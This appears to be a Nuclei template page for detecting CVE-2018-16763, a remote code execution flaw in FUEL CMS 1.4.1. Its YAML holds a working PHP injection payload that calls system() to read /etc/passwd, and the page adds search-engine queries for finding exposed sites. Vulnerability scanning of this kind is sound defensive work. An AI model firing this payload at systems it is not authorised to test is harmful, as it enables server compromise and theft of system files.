Skip to content
Nuclei Templates

FUEL CMS 1.4.1 - Remote Code Execution

ID: CVE-2018-16763

Severity: critical

Author: pikpikcu

Tags: cve,cve2018,fuelcms,rce,edb,thedaylightstudio

Description

Section titled “Description”

FUEL CMS 1.4.1 allows PHP Code Evaluation via the pages/select/ filter parameter or the preview/ data parameter.

YAML Source

Section titled “YAML Source”
id: CVE-2018-16763


info:
  name: FUEL CMS 1.4.1 - Remote Code Execution
  author: pikpikcu
  severity: critical
  description: FUEL CMS 1.4.1 allows PHP Code Evaluation via the pages/select/ filter parameter or the preview/ data parameter.
  impact: |
    Successful exploitation of this vulnerability allows an attacker to execute arbitrary code on the target system, leading to complete compromise of the application and potentially the underlying server.
  remediation: |
    Upgrade to FUEL CMS version 1.4.2 or later, which includes a patch for this vulnerability.
  reference:
    - https://www.exploit-db.com/exploits/47138
    - https://www.getfuelcms.com/
    - https://github.com/daylightstudio/FUEL-CMS/releases/tag/1.4.1
    - https://nvd.nist.gov/vuln/detail/CVE-2018-16763
    - https://github.com/daylightstudio/FUEL-CMS/issues/478
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2018-16763
    cwe-id: CWE-74
    epss-score: 0.79227
    epss-percentile: 0.98278
    cpe: cpe:2.3:a:thedaylightstudio:fuel_cms:*:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: thedaylightstudio
    product: fuel_cms
    shodan-query: http.title:"fuel cms"
    fofa-query: title="fuel cms"
    google-query: intitle:"fuel cms"
  tags: cve,cve2018,fuelcms,rce,edb,thedaylightstudio


http:
  - raw:
      - |
        GET /fuel/pages/select/?filter=%27%2bpi(print(%24a%3d%27system%27))%2b%24a(%27cat%20/etc/passwd%27)%2b%27 HTTP/1.1
        Host: {{Hostname}}


    matchers-condition: and
    matchers:
      - type: regex
        regex:
          - "root:.*:0:0:"


      - type: status
        status:
          - 200
# digest: 4a0a0047304502204f33210204c3cc21f7dbd7eae0e5495a45c2d277a7fc0af0a2495cca8695f6a7022100c0b877fa6568d53c72c804e753abe415dc5bbdfe58ae52fea21cbe416d14a4e5:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

Section titled “Guide to check the vulnerabilities”

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/cves/2018/CVE-2018-16763.yaml"

View on Github